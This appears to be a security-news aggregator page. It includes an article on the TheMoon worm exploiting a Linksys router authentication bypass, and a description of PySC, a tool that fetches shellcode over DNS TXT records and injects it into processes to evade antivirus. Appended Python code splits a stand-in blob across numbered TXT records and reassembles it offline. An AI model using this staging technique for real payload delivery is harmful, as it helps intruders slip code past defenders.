And that's it for today. Current Metasploit users can simply run msfupdate and you shall receive these changes. However, to maximize your lightning-fast pwn power, feel free to try out Metasploit Pro or the community edition (free), and watch our recently-made video from David 'TheLightCosine' Maloney on "From Framework to Pro: How to Use Metasploit Pro in Penetration Tests."

Source
-
A self-replicating program infects Linksys routers by exploiting an authentication bypass vulnerability

IDG News Service - A self-replicating program is infecting Linksys routers by exploiting an authentication bypass vulnerability in various models from the vendor's E-Series product line.

Researchers from SANS Institute's Internet Storm Center (ISC) issued an alert Wednesday about incidents where Linksys E1000 and E1200 routers had been compromised and were scanning other IP (Internet Protocol) address ranges on ports 80 and 8080.

On Thursday the ISC researchers reported that they managed to capture the malware responsible for the scanning activity in one of their honeypots -- systems intentionally left exposed to be attacked. The attacks seem to be the result of a worm -- a self-replicating program -- that compromises Linksys routers and then uses those routers to scan for other vulnerable devices.

"At this point, we are aware of a worm that is spreading among various models of Linksys routers," said Johannes Ullrich, the chief technology officer at SANS ISC, in a separate blog post. "We do not have a definite list of routers that are vulnerable, but the following routers may be vulnerable depending on firmware version: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900."

The worm, which has been dubbed TheMoon because it contains the logo of Lunar Industries, a fictitious company from the 2009 movie "The Moon," begins by requesting a /HNAP1/ URL from devices behind the scanned IP addresses. HNAP -- the Home Network Administration Protocol -- was developed by Cisco and allows identification, configuration and management of networking devices.

The worm sends the HNAP request in order to identify the router's model and firmware version. If it determines that a device is vulnerable, it sends another request to a particular CGI script that allows the execution of local commands on the device.
SANS has not disclosed the name of the CGI script because it contains an authentication bypass vulnerability. "The request does not require authentication," Ullrich said. "The worm sends random 'admin' credentials but they are not checked by the script."

The worm exploits this vulnerability to download and execute a binary file in ELF (Executable and Linkable) format compiled for the MIPS platform. When executed on a new router, this binary begins scanning for new devices to infect. It also opens an HTTP server on a random low-numbered port and uses it to serve a copy of itself to the newly identified targets.

The binary contains a hardcoded list of over 670 IP address ranges that it scans, Ullrich said. "All appear to be linked to cable or DSL modem ISPs in various countries."

It's not clear what the purpose of the malware is other than spreading to additional devices. There are some strings in the binary that suggest the existence of a command-and-control server, which would make the threat a botnet that attackers could control remotely.

Linksys is aware of the vulnerability in some E-Series routers and is working on a fix, said Mike Duin, a spokesman for Linksys owner Belkin, in an email Friday.

Ullrich outlined several mitigation strategies in comments to his blog post. First of all, routers that are not configured for remote administration are not directly exposed to this attack. If a router needs to be administered remotely, restricting access to the administrative interface by IP address will help reduce the risk, Ullrich said. Changing the port of the interface to something other than 80 or 8080 will also prevent this particular attack, he said.

Via Worm 'TheMoon' infects Linksys routers - Network World
-
PySC - Download shellcode from a remote DNS server (using TXT records) or through Internet Explorer (using SSPI to utilize system-wide proxy settings and authorization tokens) and inject it into a specified process

PySC expands on the numerous available tools and scripts to inject into a process on a running system.

Aims of this project:

- Remove shellcode from the script to help avoid detection by AV and HIPS systems
- Offer a flexible command line based script
- Also provide the ability to run fully automated, as an EXE (by using pyinstaller)

To this end this prototype script offers the ability to download shellcode from a remote DNS server (using TXT records) or through Internet Explorer (using SSPI to utilize system-wide proxy settings and authorization tokens) and inject it into a specified process. If injection into the specified process is not possible, the script falls back to injecting into the current process.

Module dependencies: none

Optional:
--> Includes server-side code for Metasploit and Python SCAPY for delivery of shellcode

YMMV

Download: https://github.com/ChrisJohnRiley/PySC.git

Sources: https://github.com/ChrisJohnRiley/PySC
{quick post} PySC Project | Cатсн²² (in)sесuяitу / ChrisJohnRiley
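The README above names DNS TXT records as one delivery channel but says nothing about how a blob fits into them. The block below is an added example, not PySC's own code or its server-side scripts: it base64-encodes a blob, cuts it across numbered TXT records (each character-string inside a TXT RR is limited to 255 bytes, so a record may hold several), packs each into a DNS response in wire format, and reassembles the blob by parsing the answers. No network is used; the zone name is assumed and the blob is a constructed byte pattern standing in for shellcode.

```python
"""
Added example, not PySC's own code: the DNS TXT side of the delivery channel
PySC describes. A blob is split across numbered TXT records, each packed
into a DNS response message in wire format, and reassembled by parsing the
answers. No network is used; the zone name and blob are constructed.
"""
import base64
import struct

ZONE = "payload.example"               # assumed zone name
SAMPLE_BLOB = bytes(range(256)) * 3    # constructed stand-in for shellcode
TYPE_TXT, CLASS_IN = 16, 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def decode_name(msg: bytes, off: int):
    """Labels or a 0xC0 compression pointer; returns (name, next offset)."""
    labels, jumped, end = [], False, None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:
            if not jumped:
                end = off + 2
            off = ((ln & 0x3F) << 8) | msg[off + 1]
            jumped = True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels), (end if jumped else off)


def to_txt_records(blob: bytes, zone: str = ZONE, per_record: int = 600):
    """Base64 the blob, cut it into pieces named <index>.<zone>; a piece
    longer than 255 bytes becomes several character-strings in one RR."""
    text = base64.b64encode(blob)
    pieces = [text[i:i + per_record] for i in range(0, len(text), per_record)]
    records = []
    for idx, piece in enumerate(pieces):
        strings = [piece[j:j + 255] for j in range(0, len(piece), 255)]
        records.append((f"{idx}.{zone}", strings))
    return records


def build_txt_response(txid: int, qname: str, strings) -> bytes:
    """Minimal DNS answer: header, the question, one TXT RR (name compressed)."""
    rdata = b"".join(bytes([len(s)]) + s for s in strings)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", TYPE_TXT, CLASS_IN)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", TYPE_TXT, CLASS_IN, 60, len(rdata)) + rdata
    return header + question + answer


def parse_txt_response(msg: bytes):
    """Return (qname, [character-strings]) from the first TXT answer."""
    _, _, _, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4  # qtype, qclass
    strings = []
    for _ in range(ancount):
        _, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == TYPE_TXT:
            p = 0
            while p < len(rdata):
                ln = rdata[p]
                strings.append(rdata[p + 1:p + 1 + ln])
                p += 1 + ln
            break
    return qname, strings


def reassemble(responses) -> bytes:
    """Order answers by their index label and decode the concatenation."""
    parts = {}
    for msg in responses:
        qname, strings = parse_txt_response(msg)
        parts[int(qname.split(".")[0])] = b"".join(strings)
    return base64.b64decode(b"".join(parts[i] for i in sorted(parts)))


def round_trip(blob: bytes = SAMPLE_BLOB) -> bool:
    """Simulate the resolver: one response per record, then reassemble."""
    responses = [build_txt_response(0x1000 + i, name, strings)
                 for i, (name, strings) in enumerate(to_txt_records(blob))]
    return reassemble(responses) == blob


if __name__ == "__main__":
    print(round_trip())
```

Indexing the records by a leading label rather than relying on answer order is what keeps reassembly correct when a resolver returns or caches them out of sequence; a detection-side reader of the same traffic would look for exactly this pattern of many numbered TXT lookups under one zone.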